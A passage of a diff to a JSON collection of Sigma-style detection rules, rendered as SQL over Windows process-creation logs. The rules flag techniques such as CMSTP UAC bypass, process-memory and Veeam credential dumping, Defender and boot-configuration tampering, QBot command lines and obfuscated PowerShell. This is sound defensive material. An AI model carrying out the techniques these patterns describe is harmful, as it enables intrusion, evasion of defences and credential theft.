NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_system_exe_anomaly.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" }, { - "title": "Suspicious Dump64.exe Execution", - "id": "129966c9-de17-4334-a123-8b58172e664d", + "title": "Regsvr32 Command Line Without DLL", + "id": "50919691-7302-437f-8e10-1fe088afa145", "status": "test", - "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", - "author": "Austin Songer @austinsonger, Florian Roth", + "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1574", + "attack.execution" ], "falsepositives": [ - "Dump64.exe in other folders than the excluded one" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" ], - "filename": "proc_creation_win_lolbin_dump64.yml" + "filename": "proc_creation_win_regsvr32_no_dll.yml" }, { - "title": "RDP Connection Allowed Via Netsh.EXE", - "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", - "status": "test", - "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", - "author": "Sander Wiebing", + "title": "Write Protect For Storage Disabled", + "id": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", + "status": "experimental", + "description": "Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.", + "author": "Sreeman", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1562" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\system\\\\currentcontrolset\\\\control%' ESCAPE '\\' AND CommandLine LIKE '%write protection%' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\' AND (CommandLine LIKE '%storage%' ESCAPE '\\' OR CommandLine LIKE '%storagedevicepolicies%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" + "filename": "proc_creation_win_reg_write_protect_for_storage_disabled.yml" }, { - "title": "APT29 2018 Phishing Campaign CommandLine Indicators", - "id": "7453575c-a747-40b9-839b-125a0aae324b", - "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "Florian Roth (Nextron Systems), @41thexplorer", + "title": "Application Whitelisting Bypass via Dxcap.exe", + "id": "60f16a96-db70-42eb-8f76-16763e333590", + "status": "test", + "description": "Detects execution of of Dxcap.exe", + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Legitimate execution of dxcap.exe by legitimate user" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%-noni -ep bypass $%' ESCAPE '\\' OR (CommandLine LIKE '%cyzfc.dat,%' ESCAPE '\\' AND CommandLine LIKE '%PointFunctionCall%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DXCap.exe' ESCAPE '\\' OR OriginalFileName = 'DXCap.exe') AND CommandLine LIKE '% -c %' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_apt29_phishing_campaign_indicators.yml" + "filename": "proc_creation_win_lolbin_susp_dxcap.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation", - "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", + "title": "Base64 Encoded PowerShell Command Detected", + "id": "e32d4572-9826-4738-b651-95fa63747e8a", "status": "test", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.t1027", - "attack.execution", + "attack.defense_evasion", + "attack.t1140", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrative script libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" + "filename": "proc_creation_win_powershell_frombase64string.yml" }, { - "title": "Renamed AutoHotkey.EXE Execution", - "id": "0f16d9cf-0616-45c8-8fad-becc11b5a41c", + "title": "Bypass UAC via CMSTP", + "id": "e66779cc-383e-4224-a3a4-267eeb585c40", "status": "test", - "description": "Detects execution of a renamed autohotkey.exe binary based on PE metadata fields", - "author": "Nasreddine Bencherchali", + "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002", + "attack.t1218.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of cmstp.exe utility by legitimate user" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%AutoHotkey%' ESCAPE '\\' OR Description LIKE '%AutoHotkey%' ESCAPE '\\' OR OriginalFileName IN ('AutoHotkey.exe', 'AutoHotkey.rc')) AND NOT ((NewProcessName LIKE '%\\\\AutoHotkey.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey32\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey64\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyA32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyA32\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU32\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU64\\_UIA.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AutoHotkey%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_autohotkey.yml" + "filename": "proc_creation_win_uac_bypass_cmstp.yml" }, { - "title": "Suspicious PowerShell Invocation From Script Engines", - "id": "95eadcb2-92e4-4ed1-9031-92547773a6db", - "status": "test", - "description": "Detects suspicious powershell invocations from interpreters or unusual programs", + "title": "Potential QBot Activity", + "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", + "status": "stable", + "description": "Detects potential QBot activity by looking for process executions used previously by QBot", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059.005" ], "falsepositives": [ - "Microsoft Operations Manager (MOM)", - "Other scripts" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\Health Service State\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_script_engine_parent.yml" + "filename": "proc_creation_win_malware_qbot.yml" }, { - "title": "PDQ Deploy Remote Adminstartion Tool Execution", - "id": "d679950c-abb7-43a6-80fb-2a480c4fc450", - "status": "experimental", - "description": "Detect use of PDQ Deploy remote admin tool", - "author": "frack113", + "title": "Malicious Windows Script Components File Execution by TAEF Detection", + "id": "634b00d5-ccc3-4a06-ae3b-0ec8444dd51b", + "status": "test", + "description": "Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces\nAdversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe\n", + "author": "Agro (@agro_sev) oscd.community", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1072" + "attack.t1218" ], "falsepositives": [ - "Legitimate use" + "It's not an uncommon to use te.exe directly to execute legal TAEF tests" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'PDQ Deploy Console' OR Product = 'PDQ Deploy' OR Company = 'PDQ.com' OR OriginalFileName = 'PDQDeployConsole.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\te.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\te.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\te.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pdqdeploy_execution.yml" + "filename": "proc_creation_win_susp_use_of_te_bin.yml" }, { - "title": "Boot Configuration Tampering Via Bcdedit.EXE", - "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", - "status": "stable", - "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Terminal Service Process Spawn", + "id": "1012f107-b8f1-4271-af30-5aed2de89b39", + "status": "test", + "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.initial_access", + "attack.t1190", + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" + "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" }, { - "title": "Suspicious Execution of Shutdown to Log Out", - "id": "ec290c06-9b6b-4338-8b6b-095c0f284f10", + "title": "Use NTFS Short Name in Image", + "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", "status": "experimental", - "description": "Detects the rare use of the command line tool shutdown to logoff a user", - "author": "frack113", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1529" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND CommandLine LIKE '%/l%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%~1.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~1.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~1.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~1.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~1.js%' ESCAPE '\\' OR NewProcessName LIKE '%~1.hta%' ESCAPE '\\' OR NewProcessName LIKE '%~2.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~2.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~2.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~2.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~2.js%' ESCAPE '\\' OR NewProcessName LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentProcessName LIKE '%-installer.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_shutdown_logoff.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" }, { - "title": "Droppers Exploiting CVE-2017-11882", - "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", - "status": "stable", - "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious UltraVNC Execution", + "id": "871b9555-69ca-4993-99d3-35a59f9f3599", + "status": "test", + "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.lateral_movement", + "attack.g0047", + "attack.t1021.005" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2017_11882.yml" + "filename": "proc_creation_win_ultravnc_susp_execution.yml" }, { - "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", - "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", - "status": "test", - "description": "Detects dump of credentials in VeeamBackup dbo", - "author": "frack113", + "title": "HackTool - Htran/NATBypass Execution", + "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", + "status": "experimental", + "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. NATBypass)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1005" + "attack.command_and_control", + "attack.t1090", + "attack.s0040" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\htran.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" + "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" }, { - "title": "Node Process Executions", - "id": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", - "status": "experimental", - "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", - "author": "Max Altgelt (Nextron Systems)", + "title": "Using SettingSyncHost.exe as LOLBin", + "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "status": "test", + "description": "Detects using SettingSyncHost.exe to run hijacked binary", + "author": "Anton Kutepov, oscd.community", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1127", - "attack.t1059.007" + "attack.t1574.008" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\Adobe Creative Cloud Experience\\\\libs\\\\node.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%Adobe Creative Cloud Experience\\\\js%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_node_adobe_creative_cloud_abuse.yml" + "filename": "proc_creation_win_lolbin_settingsynchost.yml" }, { - "title": "Use of Remote.exe", - "id": "4eddc365-79b4-43ff-a9d7-99422dc34b93", + "title": "Suspicious CMD Shell Output Redirect", + "id": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", "status": "experimental", - "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "description": "Detects inline windows shell commands redirecting output via the \">\" symbol to a suspicious location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." + "Legitimate admin scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\remote.exe' ESCAPE '\\' OR OriginalFileName = 'remote.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ((CommandLine LIKE '%> \\%USERPROFILE\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%APPDATA\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TEMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Temp\\\\%' ESCAPE '\\') OR ((CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% >> %' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_remote.yml" + "filename": "proc_creation_win_cmd_redirection_susp_folder.yml" }, { - "title": "Windows Hotfix Updates Reconnaissance Via Wmic.EXE", - "id": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", + "title": "CL_LoadAssembly.ps1 Proxy Execution", + "id": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", "status": "experimental", - "description": "Detects the execution of wmic with the \"qfe\" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of a Microsoft signed script to execute commands and bypassing AppLocker.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '% qfe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\CL\\_LoadAssembly.ps1%' ESCAPE '\\' OR CommandLine LIKE '%LoadAssemblyFromPath %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_recon_hotfix.yml" + "filename": "proc_creation_win_lolbin_cl_loadassembly.yml" }, { - "title": "Using AppVLP To Circumvent ASR File Path Rule", - "id": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", + "title": "DumpMinitool Execution", + "id": "dee0a7a3-f200-4112-a99b-952196d81e42", "status": "experimental", - "description": "Application Virtualization Utility is included with Microsoft Office. We are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", - "author": "Sreeman", + "description": "Detects the use of \"DumpMinitool.exe\" a tool that allows the dump of process memory via the use of the \"MiniDumpWriteDump\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.t1218", "attack.defense_evasion", - "attack.execution" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\appvlp.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\msoasb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DumpMinitool.x86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DumpMinitool.arm64.exe' ESCAPE '\\') OR OriginalFileName IN ('DumpMinitool.exe', 'DumpMinitool.x86.exe', 'DumpMinitool.arm64.exe')) AND (CommandLine LIKE '% Full%' ESCAPE '\\' OR CommandLine LIKE '% Mini%' ESCAPE '\\' OR CommandLine LIKE '% WithHeap%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_appvlp.yml" + "filename": "proc_creation_win_dumpminitool_execution.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference", - "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", - "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Command Line Execution with Suspicious URL and AppData Strings", + "id": "1ac8666b-046f-4201-8aba-1951aaec03a3", + "status": "test", + "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.command_and_control", + "attack.t1059.003", + "attack.t1059.001", + "attack.t1105" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "High" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = 